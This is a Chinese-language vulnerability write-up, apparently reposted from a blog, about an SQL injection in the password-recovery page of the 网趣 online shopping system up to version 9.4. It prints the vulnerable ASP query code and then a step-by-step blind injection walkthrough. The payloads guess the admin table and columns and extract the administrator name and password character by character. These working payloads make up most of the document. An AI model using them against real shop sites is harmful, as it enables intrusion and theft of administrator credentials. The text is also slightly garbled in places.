网趣网上购物系统SQL注入漏洞浅析脚本安全 -电脑资料
author: cnryan @http://hi.baidu.com/cnryan
网趣网上购物系统是一套简单易用、功能强大、用户使用最为广泛的网上购物开店平台,凭借多年的网上购物系统研发经验,软件功能日趋强大与完善、依托庞大的用户使用群体,网趣网上购物系统越来越受到用户的青睐,成为众多用户网上开店首选品牌,
网趣网上购物系统SQL注入漏洞浅析脚本安全
。这是官方的话 ↑
这个sql injection出现在找回密码处,最新版本的9.4也存在漏洞,随后对v9.0等以下版本测试均存在漏洞。
漏洞页面:getpwd2.asp
漏洞代码:
<%
username=request.form("username")
set rs=Server.CreateObject("Adodb.Recordset")
sql="select * from [user] where username='"&username&"' "
rs.open sql,conn,1,1
If rs.eof Then
%>
典型的注入,和以前的网软购物系统一个模样
http://127.0.0.1/cnhww9.4/getpwd.asp
getpwd.asp是找回密码的页面,输入的用户名交给getpwd2.asp处理,若存在用户名到达第二步,否则退出
输入 test' and 1=1 and ''='
跳到getpwd2.asp 第二步
输入 test' and 1=2 and ''='
提示没有这个用户
猜表 ->cnhww
test' and exists (select * from [admin]) and '1'='1F
test' and exists (select * from [cnhww]) and '1'='1T
字段 ->admin password
test' and exists (select admin from [cnhww]) and '1'='1T
test' and exists (select password from [cnhww]) and '1'='1T
值 -->
test' and (select top 1 asc(mid(admin,1,1)) fro
m cnhww)>97 and '1'='1Ftest' and (select top 1 asc(mid(admin,1,1)) from cnhww)>96 and '1'='1T
97=a
test' and (select top 1 asc(mid(admin,2,1)) from cnhww)>100 and '1'='1F
test' and (select top 1 asc(mid(admin,2,1)) from cnhww)>99 and '1'='1T
100=d
……
test' and (select top 1 asc(mid(password,1,1)) from cnhww)>55 and '1'='1
……
……